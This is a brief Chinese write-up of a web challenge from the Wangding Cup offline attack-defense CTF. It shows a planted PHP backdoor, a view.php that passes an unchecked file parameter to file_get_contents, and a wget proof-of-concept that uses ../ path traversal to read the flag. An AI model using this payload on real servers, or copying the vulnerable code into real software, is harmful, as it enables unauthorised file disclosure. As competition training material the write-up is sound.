网鼎杯线下AWD【WEB】
不得不说AWD对WEB狗越来越不友好了
Down下网站源码后上Seay源代码审计工具直接自动审计一波发现预留后门
路径/sites/all/modules/avatar_uploader/lib/demo/view.php
<?php$file = $_GET['file'];echo file_get_contents("uploadDir/$file");exit;
直接构造POC:wget http://ip:5072/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../flag即可获取目标机上flag